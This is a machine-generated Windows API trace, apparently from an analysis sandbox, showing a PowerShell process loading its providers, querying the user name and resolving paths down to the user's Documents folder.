	[0204.015] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xbd0f0 | out: lpFileInformation=0xbd0f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.015] SetErrorMode (uMode=0x1) returned 0x1
	[0204.015] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.015] SetErrorMode (uMode=0x1) returned 0x1
	[0204.015] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xbd0f0 | out: lpFileInformation=0xbd0f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.016] SetErrorMode (uMode=0x1) returned 0x1
	[0204.016] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbcf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.016] SetErrorMode (uMode=0x1) returned 0x1
	[0204.016] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xbd190 | out: lpFileInformation=0xbd190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.016] SetErrorMode (uMode=0x1) returned 0x1
	[0204.016] CoTaskMemAlloc (cb=0x804) returned 0x1b795b80
	[0204.016] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b795b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0204.017] CoTaskMemFree (pv=0x1b795b80) 
	[0204.017] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0204.017] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0204.017] CoTaskMemFree (pv=0x32d910) 
	[0204.018] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e0fde0*="FileSystem", lpRawData=0x2e0fb70) returned 1
	[0204.038] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0204.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.038] CoTaskMemFree (pv=0x2e4100) 
	[0204.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.039] CoTaskMemAlloc (cb=0x804) returned 0x1b795b80
	[0204.039] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b795b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0204.040] CoTaskMemFree (pv=0x1b795b80) 
	[0204.040] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0204.040] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0204.040] CoTaskMemFree (pv=0x32d910) 
	[0204.040] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e155d0*="Function", lpRawData=0x2e15360) returned 1
	[0204.065] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0204.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.065] CoTaskMemFree (pv=0x2e4100) 
	[0205.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0205.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0205.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0205.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.941] CoTaskMemAlloc (cb=0x804) returned 0x1b796b80
	[0210.941] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b796b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0210.941] CoTaskMemFree (pv=0x1b796b80) 
	[0210.941] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0210.941] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0210.941] CoTaskMemFree (pv=0x32d910) 
	[0210.942] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e47810*="Registry", lpRawData=0x2e475a0) returned 1
	[0211.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.611] CoTaskMemAlloc (cb=0x804) returned 0x1b796b80
	[0211.611] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b796b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0211.611] CoTaskMemFree (pv=0x1b796b80) 
	[0211.611] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0211.611] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0211.612] CoTaskMemFree (pv=0x32d910) 
	[0211.612] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e4cbd8*="Variable", lpRawData=0x2e4c968) returned 1
	[0211.621] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0211.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0211.621] CoTaskMemFree (pv=0x2e4100) 
	[0211.629] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0211.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0211.629] CoTaskMemFree (pv=0x2e4100) 
	[0211.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0217.925] CoTaskMemAlloc (cb=0x804) returned 0x1b796b80
	[0217.925] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b796b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0217.927] CoTaskMemFree (pv=0x1b796b80) 
	[0217.927] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0217.927] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0217.928] CoTaskMemFree (pv=0x32d910) 
	[0217.928] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e607a0*="Certificate", lpRawData=0x2e60530) returned 1
	[0218.139] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0218.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.139] CoTaskMemFree (pv=0x2e4100) 
	[0218.142] GetLogicalDrives () returned 0x4
	[0218.142] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xbd220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.142] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.143] CoTaskMemAlloc (cb=0x20e) returned 0x33c3a0
	[0218.143] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x33c3a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0218.143] CoTaskMemFree (pv=0x33c3a0) 
	[0218.145] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0218.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.145] CoTaskMemFree (pv=0x2e4100) 
	[0218.145] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0218.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.145] CoTaskMemFree (pv=0x2e4100) 
	[0218.160] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0218.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.160] CoTaskMemFree (pv=0x2e4100) 
	[0218.164] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0218.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.164] CoTaskMemFree (pv=0x2e4100) 
	[0218.166] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.166] SetErrorMode (uMode=0x1) returned 0x1
	[0218.166] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.166] SetErrorMode (uMode=0x1) returned 0x1
	[0218.166] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.167] SetErrorMode (uMode=0x1) returned 0x1
	[0218.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd1e0 | out: lpFileInformation=0xbd1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.167] SetErrorMode (uMode=0x1) returned 0x1
	[0218.715] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0218.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.715] CoTaskMemFree (pv=0x2e4100) 
	[0218.722] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbd120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.723] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.723] SetErrorMode (uMode=0x1) returned 0x1
	[0218.723] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.723] SetErrorMode (uMode=0x1) returned 0x1
	[0218.724] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.724] SetErrorMode (uMode=0x1) returned 0x1
	[0218.724] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.724] SetErrorMode (uMode=0x1) returned 0x1
	[0218.724] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbcfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.724] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xbce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.724] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.724] SetErrorMode (uMode=0x1) returned 0x1
	[0218.724] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0218.724] SetErrorMode (uMode=0x1) returned 0x1
	[0218.724] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.724] SetErrorMode (uMode=0x1) returned 0x1
	[0218.724] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0218.725] SetErrorMode (uMode=0x1) returned 0x1
	[0218.725] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xbcfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.725] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xbce90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.725] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.725] SetErrorMode (uMode=0x1) returned 0x1
	[0218.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.725] SetErrorMode (uMode=0x1) returned 0x1
	[0218.725] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.725] SetErrorMode (uMode=0x1) returned 0x1
	[0218.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.725] SetErrorMode (uMode=0x1) returned 0x1
	[0218.725] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbcfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.725] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xbce90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.726] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.726] SetErrorMode (uMode=0x1) returned 0x1
	[0218.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.726] SetErrorMode (uMode=0x1) returned 0x1
	[0218.726] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.726] SetErrorMode (uMode=0x1) returned 0x1
	[0218.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xbd1a0 | out: lpFileInformation=0xbd1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.726] SetErrorMode (uMode=0x1) returned 0x1
	[0218.726] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbcfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.726] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0xbce90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
